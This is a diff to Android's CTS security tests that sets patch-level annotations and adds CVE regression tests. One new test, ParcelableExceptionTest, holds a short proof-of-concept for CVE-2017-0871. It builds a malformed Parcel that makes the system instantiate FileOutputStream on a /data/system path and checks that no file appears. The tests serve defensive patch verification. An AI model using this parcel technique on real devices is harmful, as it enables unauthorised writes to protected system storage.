+ @SecurityTest(minPatchLevel = "2018-01")
public void testPresetReverb_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
AudioEffect.EFFECT_TYPE_PRESET_REVERB, new int[] {
diff --git a/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
new file mode 100644
index 0000000..4252614
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
@@ -0,0 +1,58 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import android.media.MediaRecorder;
+import android.test.AndroidTestCase;
+
+@SecurityTest
+public class MediaRecorderInfoLeakTest extends AndroidTestCase {
+
+ /**
+ * b/27855172
+ */
+ @SecurityTest(minPatchLevel = "2016-06")
+ public void test_cve_2016_2499() throws Exception {
+ MediaRecorder mediaRecorder = null;
+ try {
+ for (int i = 0; i < 1000; i++) {
+ mediaRecorder = new MediaRecorder();
+ mediaRecorder.setAudioSource(MediaRecorder.AudioSource.DEFAULT);
+ mediaRecorder.setVideoSource(MediaRecorder.VideoSource.SURFACE);
+ mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP);
+ mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AAC);
+ mediaRecorder.setVideoEncoder(MediaRecorder.VideoEncoder.H263);
+ mediaRecorder.setVideoFrameRate(30);
+ mediaRecorder.setVideoSize(352, 288);
+ mediaRecorder.setOutputFile("/sdcard/record.output");
+ mediaRecorder.prepare();
+ int test = mediaRecorder.getMaxAmplitude();
+ mediaRecorder.release();
+ if(test != 0){
+ fail("MediaRecorderInfoLeakTest failed");
+ }
+ }
+ } catch (Exception e) {
+ fail("Media Recorder Exception" + e.getMessage());
+ } finally {
+ if (mediaRecorder != null){
+ mediaRecorder.release();
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
index 3e36fa8..efc050f 100644
--- a/tests/tests/security/src/android/security/cts/Movie33897722.java
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -39,6 +39,7 @@
* larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
* color map, which would be reading memory that we do not control, and may be uninitialized.
*/
+ @SecurityTest(minPatchLevel = "2017-06")
public void test_android_bug_33897722() {
// The image has a 10 x 10 frame on top of a transparent background. Only test the
// 10 x 10 frame, since the original bug would never have used uninitialized memory
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 77d75d8..2e101a5 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -107,7 +107,7 @@
*/
private static native boolean doPerfEventTest2();
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index 72aff71..556031b 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -113,7 +113,10 @@
// Test package to verify upgrades to privileged applications
"com.android.cts.priv.ctsshim",
- "com.android.cts.ctsshim"
+ "com.android.cts.ctsshim",
+
+ // Oom Catcher package to prevent tests from ooming device.
+ "com.android.cts.oomcatcher"
));
diff --git a/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java b/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java
new file mode 100644
index 0000000..a024e50
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.test.AndroidTestCase;
+import android.platform.test.annotations.SecurityTest;
+import android.security.cts.R;
+
+import android.content.Context;
+import android.content.Intent;
+import android.os.BaseBundle;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.util.Log;
+
+import java.io.File;
+import java.lang.reflect.Field;
+
+@SecurityTest
+public class ParcelableExceptionTest extends AndroidTestCase {
+
+ @SecurityTest(minPatchLevel = "2017-12")
+ public void test_CVE_2017_0871() throws Exception {
+ String filePath = "/data/system/" + System.currentTimeMillis();
+ File file = new File(filePath);
+ Bundle bundle = createBundle("java.io.FileOutputStream", filePath);
+ sendBundleToSystem(bundle);
+ assertFalse(file.exists());
+ }
+
+ private Bundle createBundle(String className, String constructorArgument) throws Exception {
+ Parcel data = Parcel.obtain();
+ data.writeInt(1);
+ data.writeString("a");
+ data.writeInt(4);
+ data.writeString("android.os.ParcelableException");
+ data.writeString(className);
+ data.writeString(constructorArgument);
+
+ Bundle bundle = new Bundle();
+ Field parcelledDataField = BaseBundle.class.getDeclaredField("mParcelledData");
+ parcelledDataField.setAccessible(true);
+ parcelledDataField.set(bundle, data);
+ return bundle;
+ }
+
+ private void sendBundleToSystem(Bundle theBundle) throws Exception {
+ Context.class
+ .getMethod("sendBroadcast",
+ Intent.class,
+ String.class,
+ Bundle.class)
+ .invoke(getContext(), new Intent("DUMMY_BROADCAST"), null, theBundle);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/PutOverflowTest.java b/tests/tests/security/src/android/security/cts/PutOverflowTest.java
index 9755efa..6f7e8da 100644
--- a/tests/tests/security/src/android/security/cts/PutOverflowTest.java
+++ b/tests/tests/security/src/android/security/cts/PutOverflowTest.java
@@ -22,6 +22,7 @@
@SecurityTest
public class PutOverflowTest extends AndroidTestCase {
+ @SecurityTest(minPatchLevel = "2015-02")
public void testCrash() throws Exception {
try {
Class<?> keystoreClass = Class.forName("android.security.KeyStore");
diff --git a/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java b/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
index 8f6477e..0e698f8 100644
--- a/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
+++ b/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
@@ -64,6 +64,7 @@
public static String output = "";
private final String pattern = ".*PLAIN TEXT EXPOSED.*";
+ @SecurityTest(minPatchLevel = "2018-05")
public void test_android_CVE_2017_13309() {
context = getInstrumentation().getContext();
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index a01860c..784ce59 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -54,6 +54,10 @@
import java.net.URL;
import java.nio.ByteBuffer;
import java.io.FileOutputStream;
+import java.io.OutputStream;
+import java.io.InputStream;
+import java.net.Socket;
+import java.net.ServerSocket;
import java.io.File;
import java.util.ArrayList;
import java.util.HashMap;
@@ -81,174 +85,172 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_36725407() throws Exception {
doStagefrightTest(R.raw.bug_36725407);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3829() throws Exception {
doStagefrightTest(R.raw.cve_2016_3829);
}
- @SecurityTest
- public void testStagefright_bug_64710074() throws Exception {
- doStagefrightTest(R.raw.bug_64710074);
- }
-
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_cve_2017_0643() throws Exception {
doStagefrightTest(R.raw.cve_2017_0643);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_cve_2017_0728() throws Exception {
doStagefrightTest(R.raw.cve_2017_0728);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testStagefright_bug_62187433() throws Exception {
doStagefrightTest(R.raw.bug_62187433);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefrightANR_bug_62673844() throws Exception {
doStagefrightTestANR(R.raw.bug_62673844);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_37079296() throws Exception {
doStagefrightTest(R.raw.bug_37079296);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38342499() throws Exception {
doStagefrightTest(R.raw.bug_38342499);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_bug_22771132() throws Exception {
doStagefrightTest(R.raw.bug_22771132);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_bug_21443020() throws Exception {
doStagefrightTest(R.raw.bug_21443020_webm);
}
+ @SecurityTest(minPatchLevel = "2018-03")
public void testStagefright_bug_34360591() throws Exception {
doStagefrightTest(R.raw.bug_34360591);
}
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35763994() throws Exception {
doStagefrightTest(R.raw.bug_35763994);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_33137046() throws Exception {
doStagefrightTest(R.raw.bug_33137046);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2016_2507() throws Exception {
doStagefrightTest(R.raw.cve_2016_2507);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_31647370() throws Exception {
doStagefrightTest(R.raw.bug_31647370);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testStagefright_bug_32577290() throws Exception {
doStagefrightTest(R.raw.bug_32577290);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3836() throws Exception {
doStagefrightTest(R.raw.cve_2015_3836);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3864_b23034759() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864_b23034759);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6766() throws Exception {
doStagefrightTest(R.raw.cve_2016_6766);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-02")
public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_34031018() throws Exception {
doStagefrightTest(R.raw.bug_34031018_32bit);
doStagefrightTest(R.raw.bug_34031018_64bit);
@@ -259,32 +261,32 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65123471() throws Exception {
doStagefrightTest(R.raw.bug_65123471);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_bug_72165027() throws Exception {
doStagefrightTest(R.raw.bug_72165027);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_bug_65483665() throws Exception {
doStagefrightTest(R.raw.bug_65483665);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_cve_2017_0852_b_62815506() throws Exception {
doStagefrightTest(R.raw.cve_2017_0852_b_62815506);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testStagefright_cve_2017_13229() throws Exception {
doStagefrightTest(R.raw.cve_2017_13229);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2017_0763() throws Exception {
doStagefrightTest(R.raw.cve_2017_0763);
}
@@ -294,344 +296,342 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testBug_73965890() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_73965890_framelen);
doStagefrightTestRawBlob(R.raw.bug_73965890_hevc, "video/hevc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-10")
public void testStagefright_cve_2016_3920() throws Exception {
doStagefrightTest(R.raw.cve_2016_3920);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_bug_68953854() throws Exception {
doStagefrightTest(R.raw.bug_68953854, 1 * 60 * 1000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38448381() throws Exception {
doStagefrightTest(R.raw.bug_38448381);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3821() throws Exception {
doStagefrightTest(R.raw.cve_2016_3821);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_bug_70897454() throws Exception {
doStagefrightTestRawBlob(R.raw.b70897454_avc, "video/avc", 320, 420);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3742_b_28165659() throws Exception {
doStagefrightTest(R.raw.cve_2016_3742_b_28165659);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_35039946() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_35039946_hevc, "video/hevc", 320, 420);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38115076() throws Exception {
doStagefrightTest(R.raw.bug_38115076);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_34618607() throws Exception {
doStagefrightTest(R.raw.bug_34618607);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testStagefright_bug_69478425() throws Exception {
doStagefrightTest(R.raw.bug_69478425);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65735716() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_65735716_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testStagefright_bug_65717533() throws Exception {
doStagefrightTest(R.raw.bug_65717533_header_corrupt);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_38239864() throws Exception {
doStagefrightTest(R.raw.bug_38239864, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_cve_2017_0600() throws Exception {
doStagefrightTest(R.raw.cve_2017_0600);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_38014992() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_38014992_framelen);
doStagefrightTestRawBlob(R.raw.bug_38014992_avc, "video/avc", 640, 480, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_35584425() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_35584425_framelen);
doStagefrightTestRawBlob(R.raw.bug_35584425_avc, "video/avc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testBug_31092462() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_31092462_framelen);
doStagefrightTestRawBlob(R.raw.bug_31092462_avc, "video/avc", 1280, 1024, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testBug_34097866() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_34097866_frame_len);
doStagefrightTestRawBlob(R.raw.bug_34097866_avc, "video/avc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33862021() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33862021_frame_len);
doStagefrightTestRawBlob(R.raw.bug_33862021_hevc, "video/hevc", 160, 96, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33387820() throws Exception {
int[] frameSizes = {45, 3202, 430, 2526};
doStagefrightTestRawBlob(R.raw.bug_33387820_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_37008096() throws Exception {
int[] frameSizes = {245, 12, 33, 140, 164};
doStagefrightTestRawBlob(R.raw.bug_37008096_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_34231163() throws Exception {
int[] frameSizes = {22, 357, 217, 293, 175};
doStagefrightTestRawBlob(R.raw.bug_34231163_mpeg2, "video/mpeg2", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_33933140() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33933140_framelen);
doStagefrightTestRawBlob(R.raw.bug_33933140_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_34097915() throws Exception {
int[] frameSizes = {4140, 593, 0, 15495};
doStagefrightTestRawBlob(R.raw.bug_34097915_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_34097213() throws Exception {
int[] frameSizes = {2571, 210, 33858};
doStagefrightTestRawBlob(R.raw.bug_34097213_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testBug_28816956() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_28816956_framelen);
doStagefrightTestRawBlob(R.raw.bug_28816956_hevc, "video/hevc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33818500() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33818500_framelen);
doStagefrightTestRawBlob(R.raw.bug_33818500_avc, "video/avc", 64, 32, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_64784973() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_64784973_framelen);
doStagefrightTestRawBlob(R.raw.bug_64784973_hevc, "video/hevc", 1280, 720, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_34231231() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_34231231_framelen);
doStagefrightTestRawBlob(R.raw.bug_34231231_mpeg2, "video/mpeg2", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testBug_63045918() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_63045918_framelen);
doStagefrightTestRawBlob(R.raw.bug_63045918_hevc, "video/hevc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33298089() throws Exception {
int[] frameSizes = {3247, 430, 221, 2305};
doStagefrightTestRawBlob(R.raw.bug_33298089_avc, "video/avc", 32, 64, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_cve_2017_0599() throws Exception {
doStagefrightTest(R.raw.cve_2017_0599);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_36492741() throws Exception {
doStagefrightTest(R.raw.bug_36492741);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_38487564() throws Exception {
doStagefrightTest(R.raw.bug_38487564, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_37237396() throws Exception {
doStagefrightTest(R.raw.bug_37237396);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2016_0842() throws Exception {
doStagefrightTest(R.raw.cve_2016_0842);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-11")
public void testStagefright_bug_63121644() throws Exception {
doStagefrightTest(R.raw.bug_63121644);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2016_6712() throws Exception {
doStagefrightTest(R.raw.cve_2016_6712);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_34097231() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_34097231_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_34097672() throws Exception {
doStagefrightTest(R.raw.bug_34097672);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_33751193() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_33751193_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_36993291() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36993291_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_33818508() throws Exception {
doStagefrightTest(R.raw.bug_33818508);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_32873375() throws Exception {
doStagefrightTest(R.raw.bug_32873375);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_62673179() throws Exception {
doStagefrightTest(R.raw.bug_62673179_ts, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-03")
public void testStagefright_bug_69269702() throws Exception {
doStagefrightTest(R.raw.bug_69269702);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65398821() throws Exception {
doStagefrightTest(R.raw.bug_65398821, ( 4 * 60 * 1000 ) );
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_bug_23452792() throws Exception {
doStagefrightTest(R.raw.bug_23452792);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3820() throws Exception {
doStagefrightTest(R.raw.cve_2016_3820);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3741() throws Exception {
doStagefrightTest(R.raw.cve_2016_3741);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_2506() throws Exception {
doStagefrightTest(R.raw.cve_2016_2506);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-06")
public void testStagefright_cve_2016_2428() throws Exception {
doStagefrightTest(R.raw.cve_2016_2428);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3756() throws Exception {
doStagefrightTest(R.raw.cve_2016_3756);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_36592202() throws Exception {
Resources resources = getInstrumentation().getContext().getResources();
AssetFileDescriptor fd = resources.openRawResourceFd(R.raw.bug_36592202);
- int page_size = 25627;
- byte [] blob = new byte[page_size];
-
- // 127 bytes read and 25500 zeros constitute one Ogg page
+ final int oggPageSize = 25627;
+ byte [] blob = new byte[oggPageSize];
+ // 127 bytes read and 25500 zeros constitute one Ogg page
FileInputStream fis = fd.createInputStream();
int numRead = fis.read(blob);
fis.close();
-
// Creating temp file
final File tempFile = File.createTempFile("poc_tmp", ".ogg", null);
-
try {
final FileOutputStream tempFos = new FileOutputStream(tempFile.getAbsolutePath());
int bytesWritten = 0;
- // Repeat data till size is ~1 GB
- for (int i = 0; i < 50000; i++) {
+ final long oggPagesRequired = 50000;
+ long oggPagesAvailable = tempFile.getUsableSpace() / oggPageSize;
+ long numOggPages = Math.min(oggPagesRequired, oggPagesAvailable);
+ // Repeat data for specified number of pages
+ for (int i = 0; i < numOggPages; i++) {
tempFos.write(blob);
- bytesWritten += page_size;
+ bytesWritten += oggPageSize;
}
tempFos.close();
-
final int fileSize = bytesWritten;
- int timeout = (10 * 60 * 1000);
-
+ final int timeout = (10 * 60 * 1000);
runWithTimeout(new Runnable() {
@Override
public void run() {
try {
doStagefrightTestMediaCodec(tempFile.getAbsolutePath());
- } catch (Exception | AssertionError e) {
+ } catch (Exception | AssertionError e) {
if (!tempFile.delete()) {
Log.e(TAG, "Failed to delete temporary PoC file");
}
@@ -648,131 +648,137 @@
}
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testStagefright_bug_30822755() throws Exception {
doStagefrightTest(R.raw.bug_30822755);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_32322258() throws Exception {
doStagefrightTest(R.raw.bug_32322258);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35472997() throws Exception {
doStagefrightTest(R.raw.bug_35472997);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_34896431() throws Exception {
doStagefrightTest(R.raw.bug_34896431);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testBug_33641588() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_33641588_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
